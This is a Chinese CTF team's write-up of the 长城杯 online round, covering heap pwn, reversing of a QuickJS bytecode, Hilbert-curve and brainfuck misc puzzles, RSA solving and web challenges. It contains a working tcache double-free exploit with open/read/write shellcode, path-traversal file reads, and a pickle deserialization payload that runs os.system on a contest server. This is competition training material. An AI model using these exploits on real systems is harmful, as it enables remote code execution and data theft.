长城杯线上赛WP

安全文献 dingjiacan@antvsion.com
2021-10-11 42,003

注:本文为goodcat战队参赛wp,非官方出品

Pwn

1、K1ng_in_h3Ap_II

libc2.27-0ubuntu1.4,存在明显的UAF;

tcahce double free 控制tcache struct,将counts[]数组全部填满后, 将其释放到unsortedbin可泄露libc;

之后再次double free 将free_hook改为setcontext,布置好orw,之后读出flag。


from pwn import*

context.log_level = "debug"
context.os = "linux"
context.arch = "amd64"
context.terminal = ['tmux', 'splitw', '-h']

#r = process("./pwn2")
r = remote("47.104.175.110", 61608)
libc = ELF("./libc.so.6")

def allocate(index, size):
    r.sendlineafter(">> \n", "1")
    r.sendlineafter("input index:\n", str(index))
    r.sendlineafter("input size:\n", str(size))

def delete(index):
    r.sendlineafter(">> \n", "2")
    r.sendlineafter("input index:\n", str(index))

def edit(index, content):
    r.sendlineafter(">> \n", "3")
    r.sendlineafter("input index:\n", str(index))
    r.sendafter("input context:\n", content)

def show(index):
    r.sendlineafter(">> \n", "4")
    r.sendlineafter("input index:\n", str(index))

for i in range(8):
    allocate(0, 0x10)
allocate(0, 0x40)
for i in range(7):
    allocate(0, 0x60)

allocate(0, 0x60)
delete(0)
edit(0, 'a' * 0x10)
delete(0)

show(0)
heap_addr = u64(r.recv(6) + '\x00\x00') & 0xfffffffffffff000
print "heap_addr = " + hex(heap_addr)

edit(0, p64(heap_addr+0x10))

allocate(0, 0x60)
allocate(0, 0x60)

edit(0, 'a' * 64)
delete(0)

show(0)
malloc_hook
 = (u64(r.recvuntil('\x7f')[-6:].ljust(8, "\x00")) & 
0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym["__free_hook"]
set_context = libc_base + libc.symbols['setcontext']
mprotect = libc_base + libc.sym['mprotect']
print "libc_base = " + hex(libc_base)
print "mprotect = " + hex(mprotect)
allocate(0, 0x58)

edit(0, '\x00' * 0x58)

allocate(1, 0x38)
delete(1)

edit(1, p64(free_hook))
allocate(1, 0x38)
allocate(1, 0x38)

allocate(2, 0x30)
allocate(2, 0x30)
allocate(2, 0x30)
allocate(2, 0x30)
allocate(3, 0x10)
allocate(4, 0x30)
allocate(5, 0x30)

new_addr =  free_hook &0xFFFFFFFFFFFFF000
shellcode1 = '''
xor rdi,rdi
mov rsi,%d
mov edx,0x1000

mov eax,0
syscall

jmp rsi
''' % new_addr
edit(1, p64(set_context+53) + p64(free_hook+0x10) + asm(shellcode1))

edit(4, p64(0) + p64(new_addr) + p64(0x1000) + p64(0) + p64(0) + p64(7))
edit(5, p64(free_hook + 0x8) + p64(mprotect))


delete(2)


sleep(0.5)

shellcode2 = '''
mov rax, 0x67616c662f ;// /flag
push rax

mov rdi, rsp ;// /flag
mov rsi, 0 ;// O_RDONLY
xor rdx, rdx ;
mov rax, 2 ;// SYS_open
syscall

mov rdi, rax ;// fd 
mov rsi,rsp  ;
mov rdx, 1024 ;// nbytes
mov rax,0 ;// SYS_read
syscall

mov rdi, 1 ;// fd 
mov rsi, rsp ;// buf
mov rdx, rax ;// count 
mov rax, 1 ;// SYS_write
syscall

mov rdi, 0 ;// error_code
mov rax, 60
syscall
'''
r.sendline(asm(shellcode2))

r.interactive()

1、Just_cmp-re|Solved| working:

find the cmp str.

buu原题

hook原文

v2-876428ee655bcc5a73230a7d8bafb72a_r.png

将原文转成qword

v2-3adf7e63402f77cfff8f8d6955b2c00c_r.jpg

与加密key相加得到flag

flag{a14a424005b14e2b89ed45031ea791b9}

2、Funny_js

根据题目名称,发现是一道js框架的题目


0x02, 0x1B, 0x06, 0x72, 0x63, 0x34, 0x04, 0x73, 0x6E, 0x02, 0x69, 0x02, 0x6A, 0x02, 0x6B, 0x02, 0x6C, 0x02, 0x6D, 0x02, 0x6E, 0x04, 0x75, 0x6E, 0x06, 0x61, 0x72, 0x72, 0x0C, 0x63, 0x69, 0x70, 0x68, 0x65, 0x72, 0x2A, 0x32, 0x30, 0x32, 0x31, 0x71, 0x75, 0x69, 0x63, 0x6B, 0x6A, 0x73, 0x5F, 0x68, 0x61, 0x70, 0x70, 0x79, 0x67, 0x61, 0x6D, 0x65, 0x48, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x02, 0x73, 0x18, 0x66, 0x72, 0x6F, 0x6D, 0x43, 0x68, 0x61, 0x72, 0x43, 0x6F, 0x64, 0x65, 0x0A, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x12, 0x73, 0x6F, 0x75, 0x72, 0x63, 0x65, 0x2E, 0x6A, 0x73, 0x08, 0x64, 0x61, 0x74, 0x61, 0x06, 0x6B, 0x65, 0x79, 0x06, 0x62, 0x6F, 0x78, 0x02, 0x78, 0x08, 0x74, 0x65, 0x6D, 0x70, 0x02, 0x79, 0x06, 0x6F, 0x75, 0x74, 0x08, 0x63, 0x6F, 0x64, 0x65, 0x14, 0x63, 0x68, 0x61, 0x72, 0x43, 0x6F, 0x64, 0x65, 0x41, 0x74, 0x08, 0x70, 0x75, 0x73, 0x68, 0x0E, 0x00, 0x06, 0x00, 0x9E, 0x01, 0x00, 0x01, 0x00, 0x20, 0x00, 0x08, 0xEB, 0x04, 0x01, 0xA0, 0x01, 0x00, 0x00, 0x00, 0x40, 0xDF, 0x00, 0x00, 0x00, 0x40, 0x40, 0xE0, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE1, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE2, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE3, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE4, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE5, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE6, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE7, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE9, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE1, 0x00, 0x00, 0x00, 0x00, 0xC2, 0x00, 0x41, 0xDF, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE0, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE1, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE2, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE3, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE4, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE5, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE6, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE7, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE9, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE1, 0x00, 0x00, 0x00, 0x00, 0x04, 0xEA, 0x00, 0x00, 0x00, 0x11, 0x3A, 0xE7, 0x00, 0x00, 0x00, 0x0E, 0x04, 0xEB, 0x00, 0x00, 0x00, 0x11, 0x3A, 0xE0, 0x00, 0x00, 0x00, 0xCB, 0xC0, 0x96, 0x00, 0xC0, 0xE0, 0x00, 0xC0, 0xF4, 0x00, 0xBF, 0x44, 0xBF, 0x3D, 0xBF, 0x7D, 0xBF, 0x08, 0xC0, 0xEF, 0x00, 0xC0, 0xCB, 0x00, 0xC0, 0xFE, 0x00, 0xC0, 0xF1, 0x00, 0xBF, 0x71, 0xC0, 0xD5, 0x00, 0xC0, 0xB0, 0x00, 0xBF, 0x40, 0xBF, 0x6A, 0xBF, 0x67, 0xC0, 0xA6, 0x00, 0xC0, 0xB9, 0x00, 0xC0, 0x9F, 0x00, 0xC0, 0x9E, 0x00, 0xC0, 0xAC, 0x00, 0xBF, 0x09, 0xC0, 0xD5, 0x00, 0xC0, 0xEF, 0x00, 0xBF, 0x0C, 0xBF, 0x64, 0xC0, 0xB9, 0x00, 0xBF, 0x5A, 0xC0, 0xAE, 0x00, 0xBF, 0x6B, 0xC0, 0x83, 0x00, 0x26, 0x20, 0x00, 0xC0, 0xDF, 0x00, 0x4D, 0x20, 0x00, 0x00, 0x80, 0xBF, 0x7A, 0x4D, 0x21, 0x00, 0x00, 0x80, 0xC0, 0xE5, 0x00, 0x4D, 0x22, 0x00, 0x00, 0x80, 0xC0, 0x9D, 0x00, 0x4D, 0x23, 0x00, 0x00, 0x80, 0x11, 0x3A, 0xE8, 0x00, 0x00, 0x00, 0x0E, 0xC1, 0x01, 0x11, 0x3A, 0xE5, 0x00, 0x00, 0x00, 0xCB, 0xC1, 0x02, 0x11, 0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB, 0xB7, 0x11, 0x3A, 0xE4, 0x00, 0x00, 0x00, 0xCB, 0xB7, 0x11, 0x3A, 0xE3, 0x00, 0x00, 0x00, 0xCB, 0x39, 0xDF, 0x00, 0x00, 0x00, 0x39, 0xE0, 0x00, 0x00, 0x00, 0x39, 0xE7, 0x00, 0x00, 0x00, 0xF2, 0x11, 0x3A, 0xE9, 0x00, 0x00, 0x00, 0x0E, 0x06, 0xCB, 0xB7, 0x11, 0x3A, 0xE1, 0x00, 0x00, 0x00, 0x0E, 0x39, 0xE1, 0x00, 0x00, 0x00, 0x39, 0xE9, 0x00, 0x00, 0x00, 0xEB, 0xA5, 0xEC, 0x6E, 0x39, 0xE9, 0x00, 0x00, 0x00, 0x39, 0xE1, 0x00, 0x00, 0x00, 0x48, 0x11, 0x3A, 0xE2, 0x00, 0x00, 0x00, 0xCB, 0x39, 0xE2, 0x00, 0x00, 0x00, 0xBF, 0x38, 0xBF, 0x11, 0xA0, 0xB0, 0x11, 0x3A, 0xE4, 0x00, 0x00, 0x00, 0xCB, 0x06, 0xCB, 0x39, 0xE4, 0x00, 0x00, 0x00, 0x39, 0xE8, 0x00, 0x00, 0x00, 0x39, 0xE3, 0x00, 0x00, 0x00, 0x48, 0xAB, 0xEC, 0x0F, 0x39, 0xE5, 0x00, 0x00, 0x00, 0x93, 0x3A, 0xE5, 0x00, 0x00, 0x00, 0xCB, 0xEE, 0x0D, 0x39, 0xE6, 0x00, 0x00, 0x00, 0x93, 0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB, 0x39, 0xE3, 0x00, 0x00, 0x00, 0x93, 0x3A, 0xE3, 0x00, 0x00, 0x00, 0xCB, 0x39, 0xE1, 0x00, 0x00, 0x00, 0x93, 0x3A, 0xE1, 0x00, 0x00, 0x00, 0x0E, 0xEE, 0x86, 0x06, 0xCB, 0x39, 0xE5, 0x00, 0x00, 0x00, 0x39, 0xE9, 0x00, 0x00, 0x00, 0xEB, 0xAB, 0xEC, 0x15, 0x39, 0xE6, 0x00, 0x00, 0x00, 0xB7, 0xAB, 0xEC, 0x0C, 0xC1, 0x03, 0x11, 0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB, 0xEE, 0x0A, 0xC1, 0x04, 0x11, 0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB, 0xC3, 0x11, 0x3A, 0xEC, 0x00, 0x00, 0x00, 0xCB, 0x06, 0xCB, 0x39, 0xE6, 0x00, 0x00, 0x00, 0xC1, 0x05, 0xA7, 0xEC, 0x3A, 0x39, 0xEC, 0x00, 0x00, 0x00, 0x39, 0x97, 0x00, 0x00, 0x00, 0x43, 0xED, 0x00, 0x00, 0x00, 0x39, 0x96, 0x00, 0x00, 0x00, 0x39, 0xE6, 0x00, 0x00, 0x00, 0xC1, 0x06, 0x9E, 0xF1, 0x24, 0x01, 0x00, 0x9F, 0x11, 0x3A, 0xEC, 0x00, 0x00, 0x00, 0xCB, 0x39, 0xE6, 0x00, 0x00, 0x00, 0xC1, 0x07, 0x9D, 0x11, 0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB, 0xEE, 0xBE, 0x39, 0xEE, 0x00, 0x00, 0x00, 0x39, 0xEC, 0x00, 0x00, 0x00, 0xF1, 0xCF, 0x28, 0xDE, 0x03, 0x01, 0x20, 0x00, 0x48, 0x01, 0x00, 0x4A, 0x52, 0x3F, 0x40, 0x00, 0x7C, 0x04, 0x30, 0x30, 0x2B, 0x2B, 0x77, 0x7B, 0x5D, 0x5D, 0x6C, 0x3F, 0x0E, 0x40, 0x3F, 0x4A, 0xB7, 0x30, 0x2B, 0x3F, 0xCB, 0x4E, 0x0D, 0x0E, 0x43, 0x06, 0x00, 0xBE, 0x03, 0x02, 0x08, 0x02, 0x05, 0x00, 0x00, 0xBB, 0x01, 0x0A, 0xE0, 0x03, 0x00, 0x01, 0x00, 0xE2, 0x03, 0x00, 0x01, 0x00, 0xE4, 0x03, 0x00, 0x00, 0x00, 0xC2, 0x03, 0x00, 0x01, 0x00, 0xE6, 0x03, 0x00, 0x02, 0x00, 0xE8, 0x03, 0x00, 0x03, 0x00, 0xEA, 0x03, 0x00, 0x04, 0x00, 0xEC, 0x03, 0x00, 0x05, 0x00, 0xEE, 0x03, 0x00, 0x06, 0x00, 0xC6, 0x03, 0x00, 0x07, 0x00, 0x39, 0x94, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x01, 0xF1, 0xCB, 0xB7, 0xCC, 0xC8, 0xC0, 0x00, 0x01, 0xA5, 0xEC, 0x09, 0xC7, 0xC8, 0xC8, 0x4A, 0x95, 0x01, 0xEE, 0xF2, 0xB7, 0xCD, 0xB7, 0xCC, 0xC8, 0xC0, 0x00, 0x01, 0xA5, 0xEC, 0x2C, 0xC9, 0xC7, 0xC8, 0x48, 0x9F, 0xD4, 0x43, 0xF8, 0x00, 0x00, 0x00, 0xC8, 0xD4, 0xEB, 0x9E, 0x24, 0x01, 0x00, 0x9F, 0xC0, 0x00, 0x01, 0x9E, 0xCD, 0xC7, 0xC8, 0x48, 0xCE, 0xC7, 0xC8, 0x72, 0xC7, 0xC9, 0x48, 0x4A, 0xC7, 0xC9, 0xCA, 0x4A, 0x95, 0x01, 0xEE, 0xCF, 0xB7, 0xCD, 0xB7, 0xC5, 0x04, 0x26, 0x00, 0x00, 0xC5, 0x05, 0xB7, 0xCC, 0xC8, 0xD3, 0xEB, 0xA5, 0xEC, 0x56, 0xD3, 0x43, 0xF8, 0x00, 0x00, 0x00, 0xC8, 0x24, 0x01, 0x00, 0xC5, 0x06, 0xC9, 0xB8, 0x9F, 0xC0, 0x00, 0x01, 0x9E, 0xCD, 0xC4, 0x04, 0xC7, 0xC9, 0x48, 0x9F, 0xC0, 0x00, 0x01, 0x9E, 0xC5, 0x04, 0xC7, 0xC9, 0x48, 0xCE, 0xC7, 0xC9, 0x72, 0xC7, 0xC4, 0x04, 0x48, 0x4A, 0xC7, 0xC4, 0x04, 0xCA, 0x4A, 0xC7, 0xC9, 0x48, 0xC7, 0xC4, 0x04, 0x48, 0x9F, 0xC0, 0x00, 0x01, 0x9E, 0xC5, 0x07, 0xC4, 0x05, 0x43, 0xF9, 0x00, 0x00, 0x00, 0xC4, 0x06, 0xC7, 0xC4, 0x07, 0x48, 0xB0, 0x24, 0x01, 0x00, 0x0E, 0x95, 0x01, 0xEE, 0xA6, 0xC4, 0x05, 0x28, 0xDE, 0x03, 0x03, 0x19, 0x04, 0x35, 0x30, 0x17, 0x18, 0x0D, 0x30, 0x7B, 0x17, 0x26, 0x17, 0x19, 0x0D, 0x12, 0x1C, 0x2C, 0x40, 0x2B, 0x3F, 0x17, 0x2B, 0x1D, 0x4A, 0x5D, 0x17, 0x0A, 0x00, 0x0A, 0x00, 0x0A, 0xE8, 0x01, 0x07, 0x44, 0xB8, 0x90, 0xB5, 0x6B, 0x67, 0x80, 0x0A, 0xE8, 0x01, 0x07, 0x34, 0xA7, 0xB8, 0x48, 0x7F, 0x8D, 0xAF, 0x0A, 0x00, 0x0A, 0x28, 0x01, 0xFE, 0x0A, 0x28, 0x01, 0xFE, 0x00, 0x00, 0x00


参考了这一篇博客

https://bbs.pediy.com/thread-259014.htm

对 quickjs.c 进行 patch:

得到字节码如下,对dump出来的字节码进行分析,提取出密文

[150, 224, 244, 68, 61, 125, 8, 239, 203, 254, 241, 113, 213, 176, 6

4, 106, 103, 166, 185, 159, 158, 172, 9, 213, 239, 12, 100, 185, 90, 174, 1

07, 131, 223, 122, 229, 157]

再提取出加密过程如下:

RC4_KEY="2021quickjs_happygame" 
push_i16 150 
push_i16 224 
push_i16 244 
push_i8 68 
push_i8 61 
push_i8 125 
push_i8 8 
push_i16 239 
push_i16 203 
push_i16 254 
push_i16 241 
push_i8 113 
push_i16 213 
push_i16 176 
push_i8 64 
push_i8 106 
push_i8 103
push_i16 166 
push_i16 185 
push_i16 159 
push_i16 158 
push_i16 172 
push_i8 9 
push_i16 213 
push_i16 239 
push_i8 12 
push_i8 100 
push_i16 185 
push_i8 90 
push_i16 174 
push_i8 107 
push_i16 131 
array_from 32 
push_i16 223 
define_field "32" 
push_i8 122 
define_field "33" 
push_i16 229 
define_field "34" 
push_i16 157 43 define_field "35"


解密得到flag为flag{2021_9u1ck_1s_v3r7_1nT3r3st1n9}

Misc

1、你这flag保熟吗

binwalk提取两张图片,分别得到一个字母数字混合的表格和一个hint.txt

v2-c0a001619db3ff442c265570f55fd360_r.jpg

password.xls

v2-59d1e7f5b911e57d71a574672a9ffc2f_r.jpg

hint.txt

希尔伯格曲线 取出表格中的字符,单独放到password.txt的文件中,运行脚本如下:

import base64
from hilbertcurve.hilbertcurve import HilbertCurve
array = []
password = ''
p = 8;n=2
hilbert_curve = HilbertCurve(p, n)
with open('password.txt','r',encoding='utf-16') as file:
    # a = file.readline().replace("\t", "").replace("\n", "")
    # print(a)
    for i in range(256):
        a = file.readline().replace("\t", "").replace("\n", "")
        array.append(a)
for i in range(256*256):
    [m,n] = hilbert_curve.point_from_distance(i)
    password += array[n][m]

# print(password)
import base64
temp = password
for i in range(25):
    temp = base64.b64decode(temp)
print(temp)

得到base64加密后的密文如下:

v2-714a4edc8318f5c20de27491a8abe526_r.jpg

base解密得到密码

v2-dedfb576b6e6b66dba5c2ef07d0e4bea_r.png

解压后发现里面是brainfuck


      >+++++++++[<+++++++++++++   >-]>+                                               ++[<                         +++++++++++++++++++++++++++++
      ++++++++>-]>++[<+++++++++   +++++                                              ++++++                        +++++++++++++++++++++++++++++
      ++++++++++++>-]>++++[<+++   +++++                                             ++++++++                       +++++++++++++>-]>+++[<+++++++
      +++++                       +++++                                            ++++  ++++                      +++++
      +++++                       +++++                                           +>-]    ++++                     +++++
      +++++                       +++++                                          ++++      ++++                    +++++
      +++++                       +++++                                         ++++        ++++                   +++++
      +++++                       +++++                                        ++++          ++++                  +++++
      +++++                       >>+++                                       +++[            <+++                 +++++
      +++++                       +++++                                      +>-]              >++[                <++++
      +++++++++++++++++++++++++   +++++                                     +++++++>-]>+++++++++++[<               +++++        ++++++>-]>++[<++
      +++++++++++++++++++++++++   +++++                                    ++++++++++++++++++++++++++              +>-]>       +++++++[<++++++++
      +++++++>-]+++++++++++++++   +++++                                   ++++++++++++++++++++++++++++             +++++       +++         +++++
      +++++                       +++++                                  ++++                      ++++            +++++                   +++++
      +++++                       +++++                                 ++++                        >>++           +++[<                   +++++
      +++++                       +++++                                ++++                          >-]>          +++++                   +++[<
      +++++                       +++++                               +>-]                            >+++         +++[<                   +++++
      +++++                       +++++                              ++>-                              ]>++        +++++                   [<+++
      +++++                       +++++                             ++>-                                ]+++       +++++                   +++++
      +++++                       +++++++++++++++++++++++++++      ++++                                  ++++      +++++++++++++++++++++++++++++
      +++++                       ++++++++++++++>>++[<+++++++     ++++                                    ++++     +++++++++++++++++++++++++++++
      +++++                       ++++++++++>-]>+++++[<++++++    ++++                                      ++++    +++++>-]>+++++++[<+++++++>-]>
++++                                                                                                                                              ++++
[<+++                                                                                                                                            +++++
+>-]>+++++[<+++++++++++++++++++>-]>++++[<+++++++++++++>-]>+++++[<+++++++++++++++++++>-]+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++>>++++++[<
++++++++>-]+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++>>+++++++[<+++++++++++++++++>-
]>++[<+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++>-]>+++++++[<+++++++++++++++>-]>+++++++++[<+++++++++++++>-]>++++++[<+++++++++++++++++
>-]>+++[<+++++++++++>-]>+++++[<+++++++++++++++++++>-]>++++++++++[<++++++++++++>-]>++++++[<+++++++++++++++++>-]>+++++++[<+++++++++++++++>-]++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++>>++[<+++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++>-]>+++++[<+++++++++++++++++++++++++>-]+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++.>>+++
+++[<+++++++++++++++++++>-]<.>>++++++[<+++++++++++++++++++>-]<.>>+++[<+++++++++++++++++++++++++++++++++++++>-]<.>>++++++[<+++++++++++++++++++>-]<.>


解压后发现里面是brainfuck

uozt{SrRyvig_Xfiev_1H_4_ee0mwviuf!_xfiev}

放到编码器里面发现是atbash

v2-97befe5c42f3c1f0371b1846f9c24d61_r.jpg

v2-a31704714f61b29204c434628bac4e65_r.jpg

对应位置修改下大小写

flag{HiIbert_Curve_1S_4_vv0nderfu!_curve}

Crypto

1、 baby_rsa

to small? leak?

https://blog.cryptohack.org/cryptoctf2020#one-line-crypto

from Crypto.Util.number import long_to_bytes
from gmpy2 import invert, is_prime
from tqdm import tqdm

primes = []

for xy in tqdm(range(500)):
    for mn in range(500):
        prime = xy**(mn+1) - (xy+1)**mn
        if prime.bit_length() > 2048: break
        if is_prime(prime):
            primes.append(prime)

c = 15808773921165746378224649554032774095198531782455904169552223303513940968292896814159288417499220739875833754573943607047855256739976161598599903932981169979509871591999964856806929597805904134099901826858367778386342376768508031554802249075072366710038889306268806744179086648684738023073458982906066972340414398928411147970593935244077925448732772473619783079328351522269170879807064111318871074291073581343039389561175391039766936376267875184581643335916049461784753341115227515163545709454746272514827000601853735356551495685229995637483506735448900656885365353434308639412035003119516693303377081576975540948311

for i in range(len(primes)):
    for j in range(i, len(primes)):
        pq = primes[i]*primes[j]
        if len(bin(pq)[2:]) == 2048:
            try:
                d = invert(0x10001, (primes[i]-1)*(primes[j]-1))
                dec = long_to_bytes(pow(c, d, pq))
                if b"flag{" in dec:
                    print(dec)
            except ValueError:
                pass

已知((fac[0]+fac[1]+fac[2]) << 1) - 1的值,用其替代n。分解((fac[0]+fac[1]+fac[2]) << 1) - 1求其欧拉函数,进而求解出d和第二段。

import gmpy2
from Crypto.Util.number import *


def main():
    _n = 39796272592331896400626784951713239526857273168732133046667572399622660330587881579319314094557011554851873068389016629085963086136116425352535902598378739
    e = 0x10001
    c = 40625981017250262945230548450738951725566520252163410124565622126754739693681271649127104109038164852787767296403697462475459670540845822150397639923013223102912674748402427501588018866490878394678482061561521253365550029075565507988232729032055298992792712574569704846075514624824654127691743944112075703814043622599530496100713378696761879982542679917631570451072107893348792817321652593471794974227183476732980623835483991067080345184978482191342430627490398516912714451984152960348899589532751919272583098764118161056078536781341750142553197082925070730178092561314400518151019955104989790911460357848366016263083
    phi_n = (191 - 1) * (193 - 1) * (627383 - 1) * (1720754738477317127758682285465031939891059835873975157555031327070111123628789833299433549669619325160679719355338187877758311485785197492710491 - 1)
    d = gmpy2.invert(e, phi_n)
    m = pow(c % _n, d, _n)
    print(long_to_bytes(m))


if __name__ == '__main__':
    main()

###

Web

1、java_url

一道Java_URL。

Tomcat/8.5.71

http://eci-2zeb5ty7ty8rr8c0v8yy.cloudeci1.ichunqiu.com/

读 /../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF//web.xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">
    <servlet>
        <servlet-name>testurl</servlet-name>
        <servlet-class>com.test2.aaa1.testURL</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>testurl</servlet-name>
        <url-pattern>/testURL</url-pattern>
    </servlet-mapping>
    
    <servlet>
        <servlet-name>download</servlet-name>
        <servlet-class>com.test2.aaa1.download</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>download</servlet-name>
        <url-pattern>/download</url-pattern>
    </servlet-mapping>
</web-app>

读 /../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/classes/com/test2/aaa1/testURL.class

得到class文件

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.URL;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class testURL extends HttpServlet {
    protected void doGet(HttpServletRequest arg1, HttpServletResponse arg2) throws ServletException, IOException {
        this.doPost(arg1, arg2);
    }

    protected void doPost(HttpServletRequest arg6, HttpServletResponse arg7) throws ServletException, IOException {
        String tartget_url = arg6.getParameter("url");
        if(tartget_url.substring(0, tartget_url.indexOf(":")).matches("(?i)file|(?i)gopher|(?i)data")) {
            arg7.getWriter().write(String.valueOf(new StringBuilder().append("false")));
            return;
        }
        arg7.getWriter().write(String.valueOf(this.getContent(tartget_url)));
    }

    public StringBuilder getContent(String arg8) throws IOException {
        BufferedReader in = new BufferedReader(new InputStreamReader(new URL(arg8).openConnection().getInputStream()));
        StringBuilder content = new StringBuilder();
        while(true) {
            String inputLine = in.readLine();
            if(inputLine == null) {
                return content;
            }

            content.append(inputLine);
            content.append("\n");
        }

        return content;
    }
}


5d3de1d3043ef9c6bec0457b68d4d672_v2-16b41b746b75055d36435c0efa463f36_r.png

2、EZ_python

樱桃猫写了自己的第一个flask网站,你能帮他看看有什么问题吗?

网刃杯的easy_web,原题

文件读取,/proc/self/cmdline

app.py

import pickle
import base64
from flask import Flask, request
from flask import render_template,redirect,send_from_directory
import os
import requests
import random
from flask import send_file

app = Flask(__name__)

class User():
    def __init__(self,name,age):
        self.name = name
        self.age = age

def check(s):
    if b'R' in s:
        return 0
    return 1


@app.route("/")
def index():
    try:
        user = base64.b64decode(request.cookies.get('user'))
        if check(user):
            user = pickle.loads(user)
            username = user["username"]
        else:
            username = "bad,bad,hacker"
    except:
        username = "CTFer"
    pic = '{0}.jpg'.format(random.randint(1,7))
    
    try:
        pic=request.args.get('pic')
        with open(pic, 'rb') as f:
            base64_data = base64.b64encode(f.read())
            p = base64_data.decode()
    except:
        pic='{0}.jpg'.format(random.randint(1,7))
        with open(pic, 'rb') as f:
            base64_data = base64.b64encode(f.read())
            p = base64_data.decode()

    return render_template('index.html', uname=username, pic=p )


if __name__ == "__main__":
    app.run('0.0.0.0',port=8888)

读 /proc/self/environ 没用

MAIL=/var/mail/appUSER=appHOSTNAME=engine-1SHLVL=1PYTHON_PIP_VERSION=20.1HOME=/home/appGPG_KEY=E3FF2839C048B25C084DEBE9B26995E310250568LOGNAME=app_=/bin/suPYTHON_GET_PIP_URL=https://github.com/pypa/get-pip/raw/1fe530e9e3d800be94e04f6428460fc4fb94f5a9/get-pip.pyTERM=xtermPATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binLANG=C.UTF-8SHELL=/bin/shPYTHON_VERSION=3.8.2PWD=/appPYTHON_GET_PIP_SHA256=ce486cddac44e99496a702aa5c06c5028414ef48fdfd5242cd2fe559b13d4348


http://www.snowywar.top/?p=2538 网刃原题 

import requests
import pickle
import base64


# e = 'ls / -a'
e = 'cat /flagggggggggggggaaa'
s = pickle.dumps(e)
# print(s)
payload = b'c__main__\nUser\n)\x81}(V__setstate__\ncos\nsystem\nubV' + \
    e.encode()+b' > /tmp/1.txt\nb.'
response = requests.get("http://eci-2zecbk1aefg5marnfo77.cloudeci1.ichunqiu.com:8888/?pic=/tmp/1.txt",
cookies=dict(
    user=base64.b64encode(payload).decode()))
for l in response.content.decode().split("\n"):
    if "base64" in l:
        l = l.split("\"")[1].split(",")[1]
        print(base64.b64decode(l).decode())

flag{2e4af838-7d23-4b04-a77a-1519e8b14e8f}

本文作者:dingjiacan@antvsion.com

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/166923.html

Tags:
点赞: 0 评论:0 收藏: 0
新浪微博 QQ空间 微信扫一扫
评论  (0)
快来写下你的想法吧!

dingjiacan@antvsion.com
文章数:399 积分: 877

蚁景网安实验室(www.yijinglab.com)网络安全靶场练习平台,涉及CTF赛前指导、职业技能训练、网安专项技能提升等。

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号

活动日程

2022-06-17

Gdevops 全球敏捷运维峰会

2022-05-12

Mastering the Challenge!——来自The 3rd AutoCS 2022智能汽车信息安全大会的邀请函

2021-11-18

AutoSW 2021智能汽车软件开发大会

2021-06-27

2021中国国际网络安全博览会暨高峰论坛

2021-05-27

The 2nd AutoCS 2021智能汽车信息安全大会

2020-12-18

贝壳找房2020 ICS安全技术峰会

2020-12-11

全球敏捷运维峰会(Gdevops2020)

2020-12-04

2020京麒网络安全大会

2020-11-29

OPPO技术开放日第六期|聚焦应用与数据安全防护

